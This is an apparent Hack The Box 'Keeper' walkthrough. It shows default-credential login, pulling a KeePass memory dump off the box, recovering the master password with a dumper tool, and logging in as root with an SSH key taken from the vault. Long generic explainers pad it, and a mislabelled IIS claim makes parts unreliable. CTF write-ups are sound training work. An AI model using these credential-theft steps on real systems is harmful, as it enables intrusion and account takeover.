Hack the box — Keeper
Scanning IP: 10.1.11.127
Open ports: 22 and 80
Visiting the port 80 with web browser. A windows server IIS is open and not properly configured.
Windows Server with Internet Information Services (IIS) is a powerful combination for hosting and managing web applications and websites on Windows-based servers. IIS is a web server software developed by Microsoft that provides a platform for delivering web content, hosting web applications, and managing internet services. Here’s an overview of Windows Server IIS:
-Installation: To use IIS, you need to install it on a Windows Server operating system. It’s a feature that can be added through the Server Manager.
-Web Hosting: IIS is primarily used for hosting websites and web applications. It supports various web technologies, including HTML, CSS, JavaScript, ASP.NET, PHP, and more.
-Scalability: IIS can scale to handle a wide range of web traffic. It supports load balancing, clustering, and other features for high availability and performance.
-Security: Security is a crucial aspect of web hosting. IIS provides features like authentication, authorization, SSL/TLS support, and request filtering to protect your web applications and data.
-Application Pools: IIS uses application pools to isolate and manage web applications. This helps in ensuring the stability and performance of individual applications.
-Centralized Management: Windows Server allows for centralized management of IIS across multiple servers. Tools like Internet Information Services (IIS) Manager provide a graphical interface for configuration and management.
-FTP Server: IIS includes an FTP (File Transfer Protocol) server for secure file transfer and management.
-Server-side Scripting: It supports server-side scripting languages like ASP.NET, ASP, PHP, and more, allowing you to build dynamic web applications.
-Integration: IIS integrates seamlessly with other Microsoft technologies such as SQL Server, Active Directory, and SharePoint, making it suitable for enterprise environments.
-Logging and Monitoring: IIS provides extensive logging capabilities for tracking web server activity. You can also integrate it with monitoring tools for performance analysis.
-Customization: You can customize IIS settings and features to meet the specific requirements of your web applications. This includes configuring authentication methods, URL rewriting, and more.
-Web Services: IIS can host various web services, including SOAP-based web services and RESTful APIs.
-Content Caching: It offers content caching mechanisms to improve the speed and responsiveness of your websites and applications.
-Security Features: IIS includes security features like IP and domain restrictions, URL authorization, and dynamic IP restrictions to enhance security.
-Web Deploy: Microsoft’s Web Deploy tool allows you to simplify the deployment of web applications to IIS servers.
Windows Server IIS is a robust and versatile web server platform suitable for hosting a wide range of web applications, from small websites to large-scale enterprise solutions. It provides a secure and scalable environment for web development and hosting on Windows-based servers.
Included the ip with hostname in /etc/hosts/
Best practical system ticketing system. As googling the default username ‘root’ and password ‘password’.
Trying to understand the ins and outs of the ticketing system.
Did manage see root and lnorggard with their data.
The open ports saw earlier were 22 and 80. By using the credentials found on the ticketing system via cli was successful.
SSH — is a network protocol used to securely access and manage remote servers and devices over an unsecured network, such as the internet. It provides a secure way to log in to and control remote systems. SSH is widely used in system administration, remote server management, and secure file transfers.
Authentication: SSH uses cryptographic techniques to authenticate users and remote servers, ensuring that the communication is secure. Typically, it uses a combination of username and password or, more securely, public-key cryptography for authentication.
Encryption: All data exchanged between the client and server during an SSH session is encrypted, making it extremely difficult for attackers to intercept and decipher the communication.
Port: By default, SSH uses port 22 for communication, but it can be configured to use a different port for added security. Changing the default port can help reduce the risk of automated attacks.
SSH Keys: Public-key cryptography is a commonly used method for SSH authentication. Users generate a pair of keys: a public key and a private key. The public key is stored on the remote server, and the private key is kept secure on the user’s local machine. When the user connects to the server, the private key is used for authentication.
To generate an SSH key pair, you can use the ssh-keygen command on your local machine.
SSH Clients and Servers: SSH requires both a client and a server. The SSH client is the software used to initiate a secure connection to a remote server, while the SSH server runs on the remote system and listens for incoming connections. Common SSH clients include OpenSSH, PuTTY (for Windows), and various GUI-based clients. Most Unix-based systems come with OpenSSH pre-installed.
Tunneling: SSH can also be used for creating secure tunnels (port forwarding) to securely access services on a remote server, such as databases, web applications, or other services. This is known as SSH tunneling or port forwarding.
user.txt 🤤
Interesting files i saw: KeePassDumpFull.dmp and passcodes.kdbx
Transfer from the hackthebox to my machine.
hackthebox: python3 -m http.server
my machine: wget http://IP:Port/File
The python3 -m http.server command is used to start a simple HTTP server using Python 3. When you run this command in your terminal, it starts a web server in the current directory, and it serves the files and directories in that location over HTTP. This can be handy for quickly sharing files or testing web pages locally.
python3 -m http.server
If you’re using Python 3, this command will start the HTTP server on port 8000 by default. You’ll see output in the terminal indicating that the server is running, and it will tell you the address to access it. By default, you can access the server at http://localhost:8000 or http://127.0.0.1:8000 in your web browser.
KeePass is an open-source password manager that allows you to securely store and manage your passwords and other sensitive information. Here are some key features and information about KeePass:
Password Storage: KeePass provides a secure repository for storing your passwords. You can organize your passwords into categories, and it offers a powerful search feature for quickly finding specific credentials.
Strong Encryption: KeePass uses strong encryption algorithms to protect your stored passwords. The default encryption method is Advanced Encryption Standard (AES) with a 256-bit key.
Master Password: To access your password database, you need to create and remember a master password. This is the only password you’ll need to remember, as KeePass takes care of the rest.
Auto-Type: KeePass can automatically fill in login forms for websites and applications, making it convenient to use complex and unique passwords for each account.
Password Generation: The software has a built-in password generator that can create strong and random passwords according to your specifications.
Plugin Support: KeePass supports plugins that can extend its functionality. There are various plugins available that add features like browser integration, synchronization with cloud storage services, and more.
Cross-Platform: While KeePass is primarily a Windows application, there are ports and compatible versions available for other platforms, including macOS, Linux, Android, and iOS. This allows you to access your passwords across different devices.
Offline: KeePass is an offline password manager, which means your password database is stored locally on your device. It doesn’t rely on cloud storage for security, which can be a pro or con depending on your preferences and needs.
Open Source: Being open-source means that the software’s source code is publicly available for inspection, which can provide a higher level of trust in its security.
File Format: KeePass uses the “.kdbx” file format for password databases. You can create, open, and save “.kdbx” files, which can be used with compatible applications on different platforms.
KeePass Master Password Dumper is a simple proof-of-concept tool used to dump the master password from KeePass’s memory. Apart from the first password character.
Moved the KeePassDumpFull.dmp to the directory of keypass password dumper.
The keepass password dumper does have a great documentation on how to use properly.
I did try to run the program and caught the error. To fix the error you have to change the .NET on the program from 7 to 6.
Ran the application and it went successfully.
The password candidates:
dgrod med flode
DGROD MED FLODE
Rødgrød med fløde er en skøn dansk sommerklassiker, som både vækker minder om fortidens somre — og giver os god grund til at værdsætte de danske bær. Rødgrød med fløde kan tilberedes med alle røde og blå bær, jordbær, ribs, hindbær, solbær, brombær — og endog også stikkelsbær og blåbær. Hjemmelavet rødgrød skal blot tilberedes med kærlighed og serveres med fløde — så er der helt sikkert glæde om sommerborde.
TL;DR — password for kdbx “rødgrød med fløde”.
Downloaded the keepass to open the passcodes.kdbx
Created ppk file. A PPK (PuTTY Private Key) file is a file format used to store a private key for SSH (Secure Shell) authentication. PuTTY is a popular SSH client for Windows, and it uses PPK files to store the private keys that are used to authenticate to remote servers. Here are some key points about PPK files:
Private Key: In SSH authentication, a pair of keys is used: a public key and a private key. The private key is kept secret and should never be shared, while the public key is shared with remote servers. When you attempt to SSH into a server, the server checks if your public key matches the private key stored on your local machine.
PPK Format: PuTTY uses its own proprietary PPK format to store private keys. PPK files are typically saved with a “.ppk” file extension. These files contain the private key in a specific format that PuTTY understands.
Creating PPK Files: To create a PPK file, you typically start with a private key in another format, such as OpenSSH’s format (usually found in a file called “id_rsa” or “id_dsa”). You can use PuTTY’s “PuTTYgen” tool to convert the private key into PPK format.
PuTTYgen: PuTTYgen is a separate program included with PuTTY that allows you to generate, import, and export SSH key pairs in various formats, including PPK. You can load an existing private key and save it as a PPK file using PuTTYgen.
Using PPK Files: Once you have a PPK file, you can configure PuTTY to use it for SSH authentication. When you connect to a remote server using PuTTY, you specify the PPK file in the PuTTY configuration settings, and PuTTY will use it for authentication.
Compatibility: PPK files are specific to PuTTY and may not be compatible with other SSH clients or servers. If you need to use the same private key with other SSH clients (such as OpenSSH on Linux), you may need to convert the PPK file into the appropriate format.
Puttygen — PuTTYgen is a key pair generator tool that is included with the PuTTY suite of software. It is specifically used for generating, managing, and converting SSH key pairs for use with PuTTY and related SSH clients. Here’s how you can use PuTTYgen:
Generating SSH Key Pairs:
Open PuTTYgen.
-Choose the type of key you want to generate (usually RSA or DSA for SSH).
-Choose the desired key size (e.g., 2048 bits for RSA is a common choice).
-Click the “Generate” button.
-Follow the on-screen instructions to generate randomness for the key. This often involves moving your mouse within the PuTTYgen window.
-Once the key is generated, you will see the public key and key fingerprint displayed on the screen.
-You can optionally set a passphrase to add an extra layer of security to your private key.
-Click “Save private key” to save the private key in PPK format, which is used by PuTTY. You should protect this private key file carefully.
-Click “Save public key” to save the public key in a format that can be shared with remote servers for authentication. This is the key you typically add to the ~/.ssh/authorized_keys file on the server.
-Loading Existing Keys:
You can load existing private keys (in PPK or other formats) into PuTTYgen by clicking “Load.”
Converting Keys:
PuTTYgen can also be used to convert between different key formats. For example, you can convert a PPK private key to an OpenSSH-compatible format or vice versa.
Viewing Key Information:
You can view detailed information about a loaded key, such as its fingerprint, type, and comment.
Key Comment:
You can add a comment to your key pair. This is a useful way to label your keys for identification purposes.
Public Key Copying:
You can copy the public key’s text to your clipboard to easily paste it into the ~/.ssh/authorized_keys file on a remote server.
Modification of the file by using this command: chmod 400 filename
The command chmod 400 in Unix-like operating systems is used to change the permissions of a file. Specifically, it sets the file permissions to "read-only" for the file's owner and denies any permissions for group members and others. Here's what the numeric notation "400" means:
- The first digit (4) corresponds to the owner’s permission. In this case, the owner has read permission (4).
- The second and third digits (00) correspond to the group’s and others’ permissions, respectively. In this case, both the group and others have no permissions (0).
So, when you set the permissions of a file to “400,” it means that only the owner of the file can read it, and neither group members nor other users have any access to the file.
ssh -i id _rsa root@keeper.htb
You finally found the flag 😈
